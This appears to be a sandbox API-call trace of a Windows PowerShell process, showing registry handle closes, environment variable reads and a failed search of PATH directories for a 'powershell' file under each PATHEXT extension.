	[0431.560] RegCloseKey (hKey=0x2f4) returned 0x0
	[0431.560] RegCloseKey (hKey=0x364) returned 0x0
	[0431.561] RegCloseKey (hKey=0x360) returned 0x0
	[0431.561] RegCloseKey (hKey=0x35c) returned 0x0
	[0431.561] RegCloseKey (hKey=0x358) returned 0x0
	[0431.561] RegCloseKey (hKey=0x354) returned 0x0
	[0431.562] RegCloseKey (hKey=0x350) returned 0x0
	[0431.562] RegCloseKey (hKey=0x34c) returned 0x0
	[0431.562] RegCloseKey (hKey=0x348) returned 0x0
	[0431.562] RegCloseKey (hKey=0x344) returned 0x0
	[0431.563] RegCloseKey (hKey=0x338) returned 0x0
	[0431.563] RegCloseKey (hKey=0x334) returned 0x0
	[0431.563] RegCloseKey (hKey=0x330) returned 0x0
	[0431.563] RegCloseKey (hKey=0x32c) returned 0x0
	[0431.563] RegCloseKey (hKey=0x30c) returned 0x0

Thread:
	id = 697
	os_tid = 0x15d4

	[0436.774] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0436.778] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0436.782] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0436.783] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0436.783] CoTaskMemFree (pv=0x49d9f0) 
	[0436.784] VirtualQuery (in: lpAddress=0x1c80d960, lpBuffer=0x1c80e820, dwLength=0x30 | out: lpBuffer=0x1c80e820*(BaseAddress=0x1c80d000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0436.787] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0436.787] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0436.788] CoTaskMemFree (pv=0x49d9f0) 
	[0436.790] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0436.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0436.790] CoTaskMemFree (pv=0x49d9f0) 
	[0436.793] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0436.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0436.793] CoTaskMemFree (pv=0x49d9f0) 
	[0436.803] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0436.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0436.803] CoTaskMemFree (pv=0x49d9f0) 
	[0436.805] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0436.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0436.805] CoTaskMemFree (pv=0x49d9f0) 
	[0436.807] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0436.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0436.807] CoTaskMemFree (pv=0x49d9f0) 
	[0436.811] VirtualQuery (in: lpAddress=0x1c80dc10, lpBuffer=0x1c80ead0, dwLength=0x30 | out: lpBuffer=0x1c80ead0*(BaseAddress=0x1c80d000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0436.812] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0436.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0436.812] CoTaskMemFree (pv=0x49d9f0) 
	[0436.815] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0436.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0436.815] CoTaskMemFree (pv=0x49d9f0) 
	[0436.815] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0436.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0436.815] CoTaskMemFree (pv=0x49d9f0) 
	[0436.816] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0436.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0436.816] CoTaskMemFree (pv=0x49d9f0) 
	[0437.492] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0437.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0437.492] CoTaskMemFree (pv=0x49d9f0) 
	[0437.979] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0437.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0437.979] CoTaskMemFree (pv=0x49d9f0) 
	[0437.985] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0437.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0437.985] CoTaskMemFree (pv=0x49d9f0) 
	[0437.987] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0437.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0437.987] CoTaskMemFree (pv=0x49d9f0) 
	[0437.989] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0437.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0437.989] CoTaskMemFree (pv=0x49d9f0) 
	[0437.991] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0437.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0437.991] CoTaskMemFree (pv=0x49d9f0) 
	[0437.992] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0437.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0437.992] CoTaskMemFree (pv=0x49d9f0) 
	[0437.995] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0437.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0437.995] CoTaskMemFree (pv=0x49d9f0) 
	[0438.013] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0438.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0438.014] CoTaskMemFree (pv=0x49d9f0) 
	[0438.748] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0438.748] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0438.748] CoTaskMemFree (pv=0x49d9f0) 
	[0438.751] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0438.751] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0438.751] CoTaskMemFree (pv=0x49d9f0) 
	[0438.751] CoTaskMemAlloc (cb=0x128) returned 0x443330
	[0438.751] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x443330, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0438.752] CoTaskMemFree (pv=0x443330) 
	[0438.756] CoTaskMemAlloc (cb=0x20e) returned 0x1b8259a0
	[0438.756] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8259a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0438.757] CoTaskMemFree (pv=0x1b8259a0) 
	[0438.760] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.762] SetErrorMode (uMode=0x1) returned 0x1
	[0438.765] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.775] SetErrorMode (uMode=0x1) returned 0x1
	[0438.777] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.777] SetErrorMode (uMode=0x1) returned 0x1
	[0438.777] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.121] SetErrorMode (uMode=0x1) returned 0x1
	[0439.122] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.122] SetErrorMode (uMode=0x1) returned 0x1
	[0439.122] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.130] SetErrorMode (uMode=0x1) returned 0x1
	[0439.132] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.132] SetErrorMode (uMode=0x1) returned 0x1
	[0439.132] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.140] SetErrorMode (uMode=0x1) returned 0x1
	[0439.141] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.141] SetErrorMode (uMode=0x1) returned 0x1
	[0439.141] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.149] SetErrorMode (uMode=0x1) returned 0x1
	[0439.150] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.150] SetErrorMode (uMode=0x1) returned 0x1
	[0439.151] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.158] SetErrorMode (uMode=0x1) returned 0x1
	[0439.521] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.521] SetErrorMode (uMode=0x1) returned 0x1
	[0439.521] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.529] SetErrorMode (uMode=0x1) returned 0x1
	[0439.531] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.531] SetErrorMode (uMode=0x1) returned 0x1
	[0439.531] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.539] SetErrorMode (uMode=0x1) returned 0x1
	[0439.540] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.540] SetErrorMode (uMode=0x1) returned 0x1
	[0439.540] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.548] SetErrorMode (uMode=0x1) returned 0x1
	[0439.550] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.550] SetErrorMode (uMode=0x1) returned 0x1
	[0439.550] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.557] SetErrorMode (uMode=0x1) returned 0x1
	[0439.558] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.558] SetErrorMode (uMode=0x1) returned 0x1
	[0439.558] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.856] SetErrorMode (uMode=0x1) returned 0x1
	[0439.857] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.857] SetErrorMode (uMode=0x1) returned 0x1
	[0439.857] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.865] SetErrorMode (uMode=0x1) returned 0x1
	[0439.866] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.867] SetErrorMode (uMode=0x1) returned 0x1
	[0439.867] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.875] SetErrorMode (uMode=0x1) returned 0x1
	[0439.876] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.877] SetErrorMode (uMode=0x1) returned 0x1
	[0439.877] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0439.885] SetErrorMode (uMode=0x1) returned 0x1
	[0439.886] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0439.886] SetErrorMode (uMode=0x1) returned 0x1
	[0439.886] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.250] SetErrorMode (uMode=0x1) returned 0x1
	[0440.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.251] SetErrorMode (uMode=0x1) returned 0x1
	[0440.252] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.252] SetErrorMode (uMode=0x1) returned 0x1
	[0440.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.252] SetErrorMode (uMode=0x1) returned 0x1
	[0440.254] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.254] SetErrorMode (uMode=0x1) returned 0x1
	[0440.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.255] SetErrorMode (uMode=0x1) returned 0x1
	[0440.255] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.255] SetErrorMode (uMode=0x1) returned 0x1
	[0440.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.255] SetErrorMode (uMode=0x1) returned 0x1
	[0440.255] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.256] SetErrorMode (uMode=0x1) returned 0x1
